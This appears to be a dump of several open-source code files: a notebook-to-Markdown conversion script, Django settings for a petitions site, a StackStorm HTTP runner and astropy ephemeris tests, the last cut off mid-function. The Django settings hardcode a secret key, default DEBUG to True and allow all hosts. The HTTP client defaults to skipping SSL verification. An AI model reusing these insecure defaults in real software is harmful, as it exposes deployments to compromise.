os.system(cmd)
print('Changing working directory back to: {}'.format(cwd))
os.chdir(cwd)
# A: Write final .md file and B: copy support files to the images directory
glob_str = '{}/*'.format(support_path)
support_files = glob.glob(glob_str)
# A: Write final .md file
print('Reading generated Markdown file: {}'.format(generated_md_path))
with open(generated_md_path, 'r') as f:
md_lines = f.readlines()
print('Reading: {}'.format(generated_meta_path))
with open(generated_meta_path, 'r') as f:
meta_lines = f.readlines()
print('Writing stub Markdown file: {}'.format(stub_md_path))
support_files_found = []
with open(stub_md_path, 'w') as f:
for line in meta_lines:
f.write(line)
for line_number, line in enumerate(md_lines):
if len(line.split(support_directory)) > 1:
line = line.replace(support_directory, 'images')
found = False
for support_file in support_files:
base_filename = os.path.split(support_file)[-1]
if len(line.split(base_filename)) > 1:
print('Replacing support file {} on Markdown line {} to: {}'.format(base_filename, line_number, line))
support_files_found.append(support_file)
found = True
if not found:
raise Exception('Something is wrong with this support file reference on line number {}'.format(line_number),
(line, support_directory))
f.write(line)
if len(support_files_found) != len(support_files):
raise Exception('Not all support files were found.', (support_files, support_files_found, generated_path))
# B: copy support files to the images directory
for support_file in support_files:
base_filename = os.path.split(support_file)[-1]
image_filename = 'content/images/{}'.format(base_filename)
cmd = 'cp {} {}'.format(support_file, image_filename)
print('Copying supporting image using: {}'.format(cmd))
os.system(cmd)
return stub_md_path, final_md_path
def make_content_file_from_stub(stub_filename, generated_filename, link_filename='external_links.md'):
print('Reading stub file: {}'.format(stub_filename))
with open(stub_filename, 'r') as f:
stub_lines = f.readlines()
print('Reading link file: {}'.format(link_filename))
with open(link_filename, 'r') as f:
link_lines = f.readlines()
print('Adding links and making content file: {}'.format(generated_filename))
with open(generated_filename, 'w') as f:
for line in stub_lines + ['\n', '\n'] + link_lines:
f.write(line)
def process_arguments(args):
markdown_files = glob.glob('stubs/*.md') + glob.glob('stubs/pages/*.md')
ipynb_files = glob.glob('stubs/notebooks/*.ipynb')
ipynb_meta_files = glob.glob('stubs/notebooks/*.ipynb-meta')
generated_files = glob.glob('content/*_GENERATED_by_add_links.md') \
+ glob.glob('content/pages/*_GENERATED_by_add_links.md') \
+ glob.glob('content/notebooks/*_GENERATED_by_add_links.ipynb')
if args.clean_generated_files:
for gfn in generated_files:
print('Removing generated file: {}'.format(gfn))
os.remove(gfn)
else:
for stub in markdown_files:
generated_filename = stub.replace('stubs/', 'content/').replace('.md', '_GENERATED_by_add_links.md')
make_content_file_from_stub(stub, generated_filename)
converted_ipynb_files = []
for meta_file in ipynb_meta_files:
ipynb_file = meta_file.replace('.ipynb-meta', '.ipynb')
if ipynb_file not in ipynb_files:
print('WARNING: An IPython notebook metadata file was found without its partner: {}'.format(meta_file))
continue
stub_path, final_path = convert_ipynb_file_to_stub(ipynb_file)
make_content_file_from_stub(stub_path, final_path)
converted_ipynb_files.append(ipynb_file)
# Check if all IPython notebook files had metadata files:
for ipynb_file in ipynb_files:
if ipynb_file not in converted_ipynb_files:
print('WARNING: An IPython notebook file was found without its partner IPython notebook metadata file: {}'.format(ipynb_file))
if __name__ == '__main__':
p = make_argument_parser()
args = p.parse_args()
process_arguments(args)
| cc0-1.0 |
kpi-petitions/project-y | kpiedemocracy/settings.py | 1 | 4892 | """
Django settings for kpiedemocracy project.
Generated by 'django-admin startproject' using Django 1.8.5.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '-&gy3@3kmu2c$195q1p_7*e=-f2_u50-w6n7h*-cd-widwi3%b'
DEBUG = os.environ.get('DEBUG', 'True') == 'True'
ALLOWED_HOSTS = []
SITE_ID = 2
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.sites',
'rest_framework',
'rest_framework.authtoken',
'rest_auth',
'allauth',
'allauth.account',
'rest_auth.registration',
'allauth.socialaccount',
'allauth.socialaccount.providers.facebook',
'allauth.socialaccount.providers.vk',
'petitions',
'rest_framework_swagger',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
)
ROOT_URLCONF = 'kpiedemocracy.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'kpiedemocracy.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'handlers': {
'console': {
'class': 'logging.StreamHandler',
},
},
'loggers': {
'django': {
'handlers': ['console'],
'level': 'INFO',
'propagate': True,
},
},
}
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')
STATIC_URL = '/static/'
STATICFILES_DIRS = ("ui-dist",)
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
MEDIA_URL = '/media/'
REST_FRAMEWORK = {
'DEFAULT_PERMISSION_CLASSES': ('rest_framework.permissions.IsAdminUser',),
'PAGE_SIZE': 10,
'DEFAULT_FILTER_BACKENDS': ('rest_framework.filters.DjangoFilterBackend',)
}
FILE_UPLOAD_HANDLERS = ["django.core.files.uploadhandler.MemoryFileUploadHandler"]
AUTHENTICATION_BACKENDS = (
'django.contrib.auth.backends.ModelBackend',
'allauth.account.auth_backends.AuthenticationBackend',
)
APPEND_SLASH = True
LOGIN_REDIRECT_URL = '/'
SOCIALACCOUNT_QUERY_EMAIL = True
SOCIALACCOUNT_PROVIDERS = {
'facebook': {
'SCOPE': ['email'],
'METHOD': 'js_sdk',
'VERIFIED_EMAIL': True,
'FIELDS': [
'id',
'email',
'name',
'first_name',
'last_name'
]
}
}
ACCOUNT_EMAIL_REQUIRED = True
ACCOUNT_USERNAME_REQUIRED = True
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
# == HEROKU SETTINGS ==
# Parse database configuration from $DATABASE_URL
import dj_database_url
if dj_database_url.config():
DATABASES['default'] = dj_database_url.config()
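# DATABASE_URL is consumed by dj-database-url in its usual URL form, e.g.
# (illustrative): postgres://user:password@host:5432/dbname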
# Honor the 'X-Forwarded-Proto' header for request.is_secure()
SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')
# Allow all host headers
ALLOWED_HOSTS = ['*']
# Number of signatures needed for a petition
SIGNS_GOAL = 1000
if DEBUG:
SIGNS_GOAL = 5
DEADLINE_INTERVAL = 30 # 30 days
| apache-2.0 |
dennybaa/st2 | st2actions/st2actions/runners/httprunner.py | 2 | 9655 | # Licensed to the StackStorm, Inc ('StackStorm') under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import ast
import copy
import json
import uuid
import requests
from oslo_config import cfg
from st2actions.runners import ActionRunner
from st2common import __version__ as st2_version
from st2common import log as logging
from st2common.constants.action import LIVEACTION_STATUS_SUCCEEDED
from st2common.constants.action import LIVEACTION_STATUS_FAILED
from st2common.constants.action import LIVEACTION_STATUS_TIMED_OUT
LOG = logging.getLogger(__name__)
SUCCESS_STATUS_CODES = list(range(200, 207))  # HTTP 200-206 inclusive
# Lookup constants for runner params
RUNNER_ON_BEHALF_USER = 'user'
RUNNER_URL = 'url'
RUNNER_HEADERS = 'headers' # Debatable whether this should be action params.
RUNNER_COOKIES = 'cookies'
RUNNER_ALLOW_REDIRECTS = 'allow_redirects'
RUNNER_HTTP_PROXY = 'http_proxy'
RUNNER_HTTPS_PROXY = 'https_proxy'
RUNNER_VERIFY_SSL_CERT = 'verify_ssl_cert'
# Lookup constants for action params
ACTION_AUTH = 'auth'
ACTION_BODY = 'body'
ACTION_TIMEOUT = 'timeout'
ACTION_METHOD = 'method'
ACTION_QUERY_PARAMS = 'params'
FILE_NAME = 'file_name'
FILE_CONTENT = 'file_content'
FILE_CONTENT_TYPE = 'file_content_type'
RESPONSE_BODY_PARSE_FUNCTIONS = {
'application/json': json.loads
}
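# Only 'application/json' bodies are parsed; anything else is returned as raw
# text. Other content types could be registered the same way, e.g.
# (illustrative -- the parser name is hypothetical):
#   RESPONSE_BODY_PARSE_FUNCTIONS['application/xml'] = my_xml_parser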
def get_runner():
return HttpRunner(str(uuid.uuid4()))
class HttpRunner(ActionRunner):
def __init__(self, runner_id):
super(HttpRunner, self).__init__(runner_id=runner_id)
self._on_behalf_user = cfg.CONF.system_user.user
self._timeout = 60
def pre_run(self):
LOG.debug('Entering HttpRunner.pre_run() for liveaction_id="%s"', self.liveaction_id)
self._on_behalf_user = self.runner_parameters.get(RUNNER_ON_BEHALF_USER,
self._on_behalf_user)
self._url = self.runner_parameters.get(RUNNER_URL, None)
self._headers = self.runner_parameters.get(RUNNER_HEADERS, {})
self._cookies = self.runner_parameters.get(RUNNER_COOKIES, None)
self._allow_redirects = self.runner_parameters.get(RUNNER_ALLOW_REDIRECTS, False)
self._http_proxy = self.runner_parameters.get(RUNNER_HTTP_PROXY, None)
self._https_proxy = self.runner_parameters.get(RUNNER_HTTPS_PROXY, None)
self._verify_ssl_cert = self.runner_parameters.get(RUNNER_VERIFY_SSL_CERT, None)
def run(self, action_parameters):
client = self._get_http_client(action_parameters)
try:
result = client.run()
except requests.exceptions.Timeout as e:
result = {'error': str(e)}
status = LIVEACTION_STATUS_TIMED_OUT
else:
status = HttpRunner._get_result_status(result.get('status_code', None))
return (status, result, None)
def _get_http_client(self, action_parameters):
body = action_parameters.get(ACTION_BODY, None)
timeout = float(action_parameters.get(ACTION_TIMEOUT, self._timeout))
method = action_parameters.get(ACTION_METHOD, None)
params = action_parameters.get(ACTION_QUERY_PARAMS, None)
auth = action_parameters.get(ACTION_AUTH, {})
file_name = action_parameters.get(FILE_NAME, None)
file_content = action_parameters.get(FILE_CONTENT, None)
file_content_type = action_parameters.get(FILE_CONTENT_TYPE, None)
# Include our user agent and action name so requests can be tracked back
headers = copy.deepcopy(self._headers) if self._headers else {}
headers['User-Agent'] = 'st2/v%s' % (st2_version)
headers['X-Stanley-Action'] = self.action_name
if file_name and file_content:
files = {}
if file_content_type:
value = (file_content, file_content_type)
else:
value = (file_content)
files[file_name] = value
else:
files = None
proxies = {}
if self._http_proxy:
proxies['http'] = self._http_proxy
if self._https_proxy:
proxies['https'] = self._https_proxy
return HTTPClient(url=self._url, method=method, body=body, params=params,
headers=headers, cookies=self._cookies, auth=auth,
timeout=timeout, allow_redirects=self._allow_redirects,
proxies=proxies, files=files, verify=self._verify_ssl_cert)
@staticmethod
def _get_result_status(status_code):
return LIVEACTION_STATUS_SUCCEEDED if status_code in SUCCESS_STATUS_CODES \
else LIVEACTION_STATUS_FAILED
class HTTPClient(object):
def __init__(self, url=None, method=None, body='', params=None, headers=None, cookies=None,
auth=None, timeout=60, allow_redirects=False, proxies=None,
files=None, verify=False):
if url is None:
raise Exception('URL must be specified.')
if method is None:
if files or body:
method = 'POST'
else:
method = 'GET'
headers = headers or {}
normalized_headers = self._normalize_headers(headers=headers)
if body and 'content-length' not in normalized_headers:
headers['Content-Length'] = str(len(body))
self.url = url
self.method = method
self.headers = headers
self.body = body
self.params = params
self.headers = headers
self.cookies = cookies
self.auth = auth
self.timeout = timeout
self.allow_redirects = allow_redirects
self.proxies = proxies
self.files = files
self.verify = verify
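# A minimal usage sketch (the URL is a placeholder, not a real endpoint):
#   client = HTTPClient(url='http://example.com/api', method='GET')
#   result = client.run()
#   # result -> {'status_code': ..., 'body': ..., 'parsed': ..., 'headers': ...}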
def run(self):
results = {}
resp = None
json_content = self._is_json_content()
try:
if json_content:
# cast params (body) to dict
data = self._cast_object(self.body)
try:
data = json.dumps(data)
except ValueError:
msg = 'Request body (%s) can\'t be parsed as JSON' % (data)
raise ValueError(msg)
else:
data = self.body
resp = requests.request(
self.method,
self.url,
params=self.params,
data=data,
headers=self.headers,
cookies=self.cookies,
auth=self.auth,
timeout=self.timeout,
allow_redirects=self.allow_redirects,
proxies=self.proxies,
files=self.files,
verify=self.verify
)
headers = dict(resp.headers)
body, parsed = self._parse_response_body(headers=headers, body=resp.text)
results['status_code'] = resp.status_code
results['body'] = body
results['parsed'] = parsed # flag which indicates if body has been parsed
results['headers'] = headers
return results
except Exception as e:
LOG.exception('Exception making request to remote URL: %s, %s', self.url, e)
raise
finally:
if resp:
resp.close()
def _parse_response_body(self, headers, body):
"""
:param body: Response body.
:type body: ``str``
:return: (parsed body, flag which indicates if body has been parsed)
:rtype: (``object``, ``bool``)
"""
body = body or ''
headers = self._normalize_headers(headers=headers)
content_type = headers.get('content-type', None)
parsed = False
if not content_type:
return (body, parsed)
# The header can also contain charset which we simply discard
content_type = content_type.split(';')[0]
parse_func = RESPONSE_BODY_PARSE_FUNCTIONS.get(content_type, None)
if not parse_func:
return (body, parsed)
LOG.debug('Parsing body with content type: %s', content_type)
try:
body = parse_func(body)
except Exception:
LOG.exception('Failed to parse body')
else:
parsed = True
return (body, parsed)
def _normalize_headers(self, headers):
"""
Normalize the header keys by lowercasing all the keys.
"""
result = {}
for key, value in headers.items():
result[key.lower()] = value
return result
def _is_json_content(self):
normalized = self._normalize_headers(self.headers)
return normalized.get('content-type', None) == 'application/json'
def _cast_object(self, value):
if isinstance(value, str) or isinstance(value, unicode):
try:
return json.loads(value)
except ValueError:
return ast.literal_eval(value)
else:
return value
| apache-2.0 |
StuartLittlefair/astropy | astropy/coordinates/tests/test_solar_system.py | 1 | 19799 | import os
import pytest
import numpy as np
from urllib.error import HTTPError
from astropy.time import Time
from astropy import units as u
from astropy.constants import c
from astropy.coordinates.builtin_frames import GCRS, TETE
from astropy.coordinates.earth import EarthLocation
from astropy.coordinates.sky_coordinate import SkyCoord
from astropy.coordinates.representation import CartesianRepresentation, UnitSphericalRepresentation
from astropy.coordinates.solar_system import (get_body, get_moon, BODY_NAME_TO_KERNEL_SPEC,
_get_apparent_body_position, solar_system_ephemeris,
get_body_barycentric, get_body_barycentric_posvel)
from astropy.coordinates.funcs import get_sun
from astropy.tests.helper import assert_quantity_allclose
from astropy.units import allclose as quantity_allclose
from astropy.utils.data import download_file
try:
import jplephem # pylint: disable=W0611
except ImportError:
HAS_JPLEPHEM = False
else:
HAS_JPLEPHEM = True
try:
from skyfield.api import Loader, Topos # pylint: disable=W0611
except ImportError:
HAS_SKYFIELD = False
else:
HAS_SKYFIELD = True
de432s_separation_tolerance_planets = 5*u.arcsec
de432s_separation_tolerance_moon = 5*u.arcsec
de432s_distance_tolerance = 20*u.km
skyfield_angular_separation_tolerance = 1*u.arcsec
skyfield_separation_tolerance = 10*u.km
@pytest.mark.remote_data
@pytest.mark.skipif('not HAS_SKYFIELD')
def test_positions_skyfield(tmpdir):
"""
Test positions against those generated by skyfield.
"""
load = Loader(tmpdir)
t = Time('1980-03-25 00:00')
location = None
# skyfield ephemeris
try:
planets = load('de421.bsp')
ts = load.timescale()
except OSError as e:
if os.environ.get('CI', False) and 'timed out' in str(e):
pytest.xfail('Timed out in CI')
else:
raise
mercury, jupiter, moon = planets['mercury'], planets['jupiter barycenter'], planets['moon']
earth = planets['earth']
skyfield_t = ts.from_astropy(t)
if location is not None:
earth = earth+Topos(latitude_degrees=location.lat.to_value(u.deg),
longitude_degrees=location.lon.to_value(u.deg),
elevation_m=location.height.to_value(u.m))
skyfield_mercury = earth.at(skyfield_t).observe(mercury).apparent()
skyfield_jupiter = earth.at(skyfield_t).observe(jupiter).apparent()
skyfield_moon = earth.at(skyfield_t).observe(moon).apparent()
if location is not None:
frame = TETE(obstime=t, location=location)
else:
frame = TETE(obstime=t)
ra, dec, dist = skyfield_mercury.radec(epoch='date')
skyfield_mercury = SkyCoord(ra.to(u.deg), dec.to(u.deg), distance=dist.to(u.km),
frame=frame)
ra, dec, dist = skyfield_jupiter.radec(epoch='date')
skyfield_jupiter = SkyCoord(ra.to(u.deg), dec.to(u.deg), distance=dist.to(u.km),
frame=frame)
ra, dec, dist = skyfield_moon.radec(epoch='date')
skyfield_moon = SkyCoord(ra.to(u.deg), dec.to(u.deg), distance=dist.to(u.km),
frame=frame)
# planet positions w.r.t true equator and equinox
moon_astropy = get_moon(t, location, ephemeris='de430').transform_to(frame)
mercury_astropy = get_body('mercury', t, location, ephemeris='de430').transform_to(frame)
jupiter_astropy = get_body('jupiter', t, location, ephemeris='de430').transform_to(frame)
assert (moon_astropy.separation(skyfield_moon) <
skyfield_angular_separation_tolerance)
assert (moon_astropy.separation_3d(skyfield_moon) < skyfield_separation_tolerance)
assert (jupiter_astropy.separation(skyfield_jupiter) <
skyfield_angular_separation_tolerance)
assert (jupiter_astropy.separation_3d(skyfield_jupiter) <
skyfield_separation_tolerance)
assert (mercury_astropy.separation(skyfield_mercury) <
skyfield_angular_separation_tolerance)
assert (mercury_astropy.separation_3d(skyfield_mercury) <
skyfield_separation_tolerance)
class TestPositionsGeocentric:
"""
Test positions against those generated by JPL Horizons accessed on
2016-03-28, with refraction turned on.
"""
def setup(self):
self.t = Time('1980-03-25 00:00')
self.apparent_frame = TETE(obstime=self.t)
# Results returned by JPL Horizons web interface
self.horizons = {
'mercury': SkyCoord(ra='22h41m47.78s', dec='-08d29m32.0s',
distance=c*6.323037*u.min, frame=self.apparent_frame),
'moon': SkyCoord(ra='07h32m02.62s', dec='+18d34m05.0s',
distance=c*0.021921*u.min, frame=self.apparent_frame),
'jupiter': SkyCoord(ra='10h17m12.82s', dec='+12d02m57.0s',
distance=c*37.694557*u.min, frame=self.apparent_frame),
'sun': SkyCoord(ra='00h16m31.00s', dec='+01d47m16.9s',
distance=c*8.294858*u.min, frame=self.apparent_frame)}
@pytest.mark.parametrize(('body', 'sep_tol', 'dist_tol'),
(('mercury', 7.*u.arcsec, 1000*u.km),
('jupiter', 78.*u.arcsec, 76000*u.km),
('moon', 20.*u.arcsec, 80*u.km),
('sun', 5.*u.arcsec, 11.*u.km)))
def test_erfa_planet(self, body, sep_tol, dist_tol):
"""Test predictions using erfa/plan94.
Accuracies are the maximum deviations listed in erfa/plan94.c for Jupiter and
Mercury, and the value quoted in Meeus "Astronomical Algorithms" (1998) for the Moon.
"""
astropy = get_body(body, self.t, ephemeris='builtin')
horizons = self.horizons[body]
# convert to true equator and equinox
astropy = astropy.transform_to(self.apparent_frame)
# Assert sky coordinates are close.
assert astropy.separation(horizons) < sep_tol
# Assert distances are close.
assert_quantity_allclose(astropy.distance, horizons.distance,
atol=dist_tol)
@pytest.mark.remote_data
@pytest.mark.skipif('not HAS_JPLEPHEM')
@pytest.mark.parametrize('body', ('mercury', 'jupiter', 'sun'))
def test_de432s_planet(self, body):
astropy = get_body(body, self.t, ephemeris='de432s')
horizons = self.horizons[body]
# convert to true equator and equinox
astropy = astropy.transform_to(self.apparent_frame)
# Assert sky coordinates are close.
assert (astropy.separation(horizons) <
de432s_separation_tolerance_planets)
# Assert distances are close.
assert_quantity_allclose(astropy.distance, horizons.distance,
atol=de432s_distance_tolerance)
@pytest.mark.remote_data
@pytest.mark.skipif('not HAS_JPLEPHEM')
def test_de432s_moon(self):
astropy = get_moon(self.t, ephemeris='de432s')
horizons = self.horizons['moon']
# convert to true equator and equinox
astropy = astropy.transform_to(self.apparent_frame)
# Assert sky coordinates are close.
assert (astropy.separation(horizons) <
de432s_separation_tolerance_moon)
# Assert distances are close.
assert_quantity_allclose(astropy.distance, horizons.distance,
atol=de432s_distance_tolerance)
class TestPositionKittPeak:
"""
Test positions against those generated by JPL Horizons accessed on
2016-03-28, with refraction turned on.
"""
def setup(self):
kitt_peak = EarthLocation.from_geodetic(lon=-111.6*u.deg,
lat=31.963333333333342*u.deg,
height=2120*u.m)
self.t = Time('2014-09-25T00:00', location=kitt_peak)
self.apparent_frame = TETE(obstime=self.t, location=kitt_peak)
# Results returned by JPL Horizons web interface
self.horizons = {
'mercury': SkyCoord(ra='13h38m58.50s', dec='-13d34m42.6s',
distance=c*7.699020*u.min, frame=self.apparent_frame),
'moon': SkyCoord(ra='12h33m12.85s', dec='-05d17m54.4s',
distance=c*0.022054*u.min, frame=self.apparent_frame),
'jupiter': SkyCoord(ra='09h09m55.55s', dec='+16d51m57.8s',
distance=c*49.244937*u.min, frame=self.apparent_frame)}
@pytest.mark.parametrize(('body', 'sep_tol', 'dist_tol'),
(('mercury', 7.*u.arcsec, 500*u.km),
('jupiter', 78.*u.arcsec, 82000*u.km)))
def test_erfa_planet(self, body, sep_tol, dist_tol):
"""Test predictions using erfa/plan94.
Accuracies are maximum deviations listed in erfa/plan94.c.
"""
# Add uncertainty in position of Earth
dist_tol = dist_tol + 1300 * u.km
astropy = get_body(body, self.t, ephemeris='builtin')
horizons = self.horizons[body]
# convert to true equator and equinox
astropy = astropy.transform_to(self.apparent_frame)
# Assert sky coordinates are close.
assert astropy.separation(horizons) < sep_tol
# Assert distances are close.
assert_quantity_allclose(astropy.distance, horizons.distance,
atol=dist_tol)
@pytest.mark.remote_data
@pytest.mark.skipif('not HAS_JPLEPHEM')
@pytest.mark.parametrize('body', ('mercury', 'jupiter'))
def test_de432s_planet(self, body):
astropy = get_body(body, self.t, ephemeris='de432s')
horizons = self.horizons[body]
# convert to true equator and equinox
astropy = astropy.transform_to(self.apparent_frame)
# Assert sky coordinates are close.
assert (astropy.separation(horizons) <
de432s_separation_tolerance_planets)
# Assert distances are close.
assert_quantity_allclose(astropy.distance, horizons.distance,
atol=de432s_distance_tolerance)
@pytest.mark.remote_data
@pytest.mark.skipif('not HAS_JPLEPHEM')
def test_de432s_moon(self):
astropy = get_moon(self.t, ephemeris='de432s')
horizons = self.horizons['moon']
# convert to true equator and equinox
astropy = astropy.transform_to(self.apparent_frame)
# Assert sky coordinates are close.
assert (astropy.separation(horizons) <
de432s_separation_tolerance_moon)
# Assert distances are close.
assert_quantity_allclose(astropy.distance, horizons.distance,
atol=de432s_distance_tolerance)
@pytest.mark.remote_data
@pytest.mark.skipif('not HAS_JPLEPHEM')
@pytest.mark.parametrize('bodyname', ('mercury', 'jupiter'))
def test_custom_kernel_spec_body(self, bodyname):
"""
Checks that giving a kernel specifier instead of a body name works
"""
coord_by_name = get_body(bodyname, self.t, ephemeris='de432s')
kspec = BODY_NAME_TO_KERNEL_SPEC[bodyname]
coord_by_kspec = get_body(kspec, self.t, ephemeris='de432s')
assert_quantity_allclose(coord_by_name.ra, coord_by_kspec.ra)
assert_quantity_allclose(coord_by_name.dec, coord_by_kspec.dec)
assert_quantity_allclose(coord_by_name.distance, coord_by_kspec.distance)
@pytest.mark.remote_data
def test_horizons_consistency_with_precision():
"""
A test to compare at high precision against the output of JPL Horizons.
Tests ephemerides, and conversions from ICRS to GCRS to TETE. We are aiming for
better than 2 milli-arcsecond precision.
We use the Moon since it is nearby, and moves fast in the sky so we are
testing for parallax, proper handling of light deflection and aberration.
"""
# JPL Horizon values for 2020_04_06 00:00 to 23:00 in 1 hour steps
# JPL Horizons has a known offset (frame bias) of 51.02 mas in RA. We correct that here
ra_apparent_horizons = [
170.167332531, 170.560688674, 170.923834838, 171.271663481, 171.620188972, 171.985340827,
172.381766539, 172.821772139, 173.314502650, 173.865422398, 174.476108551, 175.144332386,
175.864375310, 176.627519827, 177.422655853, 178.236955730, 179.056584831, 179.867427392,
180.655815385, 181.409252074, 182.117113814, 182.771311578, 183.366872837, 183.902395443
] * u.deg + 51.02376467 * u.mas
dec_apparent_horizons = [
10.269112037, 10.058820647, 9.837152044, 9.603724551, 9.358956528, 9.104012390, 8.840674927,
8.571162442, 8.297917326, 8.023394488, 7.749873882, 7.479312991, 7.213246666, 6.952732614,
6.698336823, 6.450150213, 6.207828142, 5.970645962, 5.737565957, 5.507313851, 5.278462034,
5.049521497, 4.819038911, 4.585696512
] * u.deg
with solar_system_ephemeris.set('de430'):
loc = EarthLocation.from_geodetic(-67.787260*u.deg, -22.959748*u.deg, 5186*u.m)
times = Time('2020-04-06 00:00') + np.arange(0, 24, 1)*u.hour
astropy = get_body('moon', times, loc)
apparent_frame = TETE(obstime=times, location=loc)
astropy = astropy.transform_to(apparent_frame)
usrepr = UnitSphericalRepresentation(ra_apparent_horizons, dec_apparent_horizons)
horizons = apparent_frame.realize_frame(usrepr)
assert_quantity_allclose(astropy.separation(horizons), 0*u.mas, atol=1.5*u.mas)
@pytest.mark.remote_data
@pytest.mark.skipif('not HAS_JPLEPHEM')
@pytest.mark.parametrize('time', (Time('1960-01-12 00:00'),
Time('1980-03-25 00:00'),
Time('2010-10-13 00:00')))
def test_get_sun_consistency(time):
"""
Test that the sun from JPL and the builtin get_sun match
"""
sun_jpl_gcrs = get_body('sun', time, ephemeris='de432s')
builtin_get_sun = get_sun(time)
sep = builtin_get_sun.separation(sun_jpl_gcrs)
assert sep < 0.1*u.arcsec
def test_get_moon_nonscalar_regression():
"""
Test that the builtin ephemeris works with non-scalar times.
See Issue #5069.
"""
times = Time(["2015-08-28 03:30", "2015-09-05 10:30"])
# the following line will raise an Exception if the bug recurs.
get_moon(times, ephemeris='builtin')
def test_barycentric_pos_posvel_same():
# Check that the two routines give identical results.
ep1 = get_body_barycentric('earth', Time('2016-03-20T12:30:00'))
ep2, _ = get_body_barycentric_posvel('earth', Time('2016-03-20T12:30:00'))
assert np.all(ep1.xyz == ep2.xyz)
def test_earth_barycentric_velocity_rough():
# Check that a time near the equinox gives roughly the right result.
ep, ev = get_body_barycentric_posvel('earth', Time('2016-03-20T12:30:00'))
assert_quantity_allclose(ep.xyz, [-1., 0., 0.]*u.AU, atol=0.01*u.AU)
expected = u.Quantity([0.*u.one,
np.cos(23.5*u.deg),
np.sin(23.5*u.deg)]) * -30. * u.km / u.s
assert_quantity_allclose(ev.xyz, expected, atol=1.*u.km/u.s)
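# Sanity check on the numbers above: orbital speed is roughly
# 2*pi*AU/yr ~ 29.8 km/s, and near the March equinox the Earth sits near
# x = -1 AU moving along -y in the ecliptic, which projects onto equatorial
# coordinates as (0, cos(23.5 deg), sin(23.5 deg)) * -30 km/s.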
def test_earth_barycentric_velocity_multi_d():
# Might as well test it with a multidimensional array too.
t = Time('2016-03-20T12:30:00') + np.arange(8.).reshape(2, 2, 2) * u.yr / 2.
ep, ev = get_body_barycentric_posvel('earth', t)
# note: assert_quantity_allclose doesn't like the shape mismatch.
# this is a problem with np.testing.assert_allclose.
assert quantity_allclose(ep.get_xyz(xyz_axis=-1),
[[-1., 0., 0.], [+1., 0., 0.]]*u.AU,
atol=0.06*u.AU)
expected = u.Quantity([0.*u.one,
np.cos(23.5*u.deg),
np.sin(23.5*u.deg)]) * ([[-30.], [30.]] * u.km / u.s)
assert quantity_allclose(ev.get_xyz(xyz_axis=-1), expected,
atol=2.*u.km/u.s)
@pytest.mark.remote_data
@pytest.mark.skipif('not HAS_JPLEPHEM')
@pytest.mark.parametrize(('body', 'pos_tol', 'vel_tol'),
(('mercury', 1000.*u.km, 1.*u.km/u.s),
('jupiter', 100000.*u.km, 2.*u.km/u.s),
('earth', 10*u.km, 10*u.mm/u.s)))
def test_barycentric_velocity_consistency(body, pos_tol, vel_tol):
# Tolerances are about 1.5 times the rms listed for plan94 and epv00,
# except for Mercury (which nominally is 334 km rms)
t = Time('2016-03-20T12:30:00')
ep, ev = get_body_barycentric_posvel(body, t, ephemeris='builtin')
dp, dv = get_body_barycentric_posvel(body, t, ephemeris='de432s')
assert_quantity_allclose(ep.xyz, dp.xyz, atol=pos_tol)
assert_quantity_allclose(ev.xyz, dv.xyz, atol=vel_tol)
# Might as well test it with a multidimensional array too.
t = Time('2016-03-20T12:30:00') + np.arange(8.).reshape(2, 2, 2) * u.yr / 2.
ep, ev = get_body_barycentric_posvel(body, t, ephemeris='builtin')
dp, dv = get_body_barycentric_posvel(body, t, ephemeris='de432s')
assert_quantity_allclose(ep.xyz, dp.xyz, atol=pos_tol)
assert_quantity_allclose(ev.xyz, dv.xyz, atol=vel_tol)
@pytest.mark.remote_data
@pytest.mark.skipif('not HAS_JPLEPHEM')
@pytest.mark.parametrize('time', (Time('1960-01-12 00:00'),
Time('1980-03-25 00:00'),
Time('2010-10-13 00:00')))
def test_url_or_file_ephemeris(time):
# URL for ephemeris de432s used for testing:
